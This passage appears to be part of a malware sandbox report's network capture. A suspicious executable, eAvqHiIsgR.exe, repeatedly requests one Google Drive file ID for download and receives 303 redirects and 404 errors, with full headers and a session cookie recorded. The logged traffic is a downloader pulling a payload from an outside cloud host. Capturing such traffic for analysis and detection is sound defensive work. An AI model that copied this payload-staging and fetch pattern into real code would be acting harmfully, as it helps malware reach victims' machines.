ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49926	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:05 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:06 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:06 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-NC1mfIp3WMlTLw0xppNdiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC7cWWTZeWJfD90XXaSqZQVdCM0zBf2bmj-R7i3r4NmXeT56BbsSLMj5gdgMUFCadqp-fM3HnY0rIw Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:06 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 67 67 6a 78 53 6c 61 54 79 43 47 46 35 36 48 51 41 74 59 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hggjxSlaTyCGF56HQAtY4A">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49931	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:08 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:09 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:09 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-_oT0Jsfbz4UiLwOgmBU_OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49937	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:11 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:12 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:11 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-xUDY6CkoU7E52uc_kdM4cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC6ByAr539xd3V7MxLKzhTtql6HdNWSZ6ktJXRrgn8eIM1yqzjYCk3fb8YlRTsho7XjX3pEknKsJ3A Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:12 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 47 56 77 6b 44 45 43 67 62 6f 54 2d 59 36 43 5a 61 31 48 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nGVwkDECgboT-Y6CZa1HpA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49943	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:14 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:15 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:14 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Ts9vIN3hI0ZS7OxPuMEuPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49950	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:17 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:18 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:17 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-2j4stuyg7KoLcVdUEhjvMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC5W6vDrPilNTHMEAhKAbFG2rH-PwxMfbrHHuy-YT5fA2KfQ5kpY-6NYLI3k6gWsiPFOmMA5bDtpkg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:18 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 4e 4a 49 64 38 61 51 6f 6e 53 6a 56 79 6e 42 6b 54 44 73 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8NJId8aQonSjVynBkTDslw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49951	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:19 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:20 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:20 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-96AmGGkxIdYbH4Jqc_G6qA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49952	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:22 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:23 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:23 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-KNI-Teaqz8V2xSJeDX3NsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC7GmGIfpUg2Ify1PaAvOUmIAwtFIitUAy0QmfOd9imZL-i3uCz6OpPDeqsJpmkgu-9hSPPzRfQZsg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:23 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 58 36 51 73 61 41 42 33 76 39 61 31 74 59 38 50 6d 51 69 39 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aX6QsaAB3v9a1tY8PmQi9Q">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49953	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:25 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:26 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:26 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-QSAE3K3GYj45mXuEQhMDZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49954	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
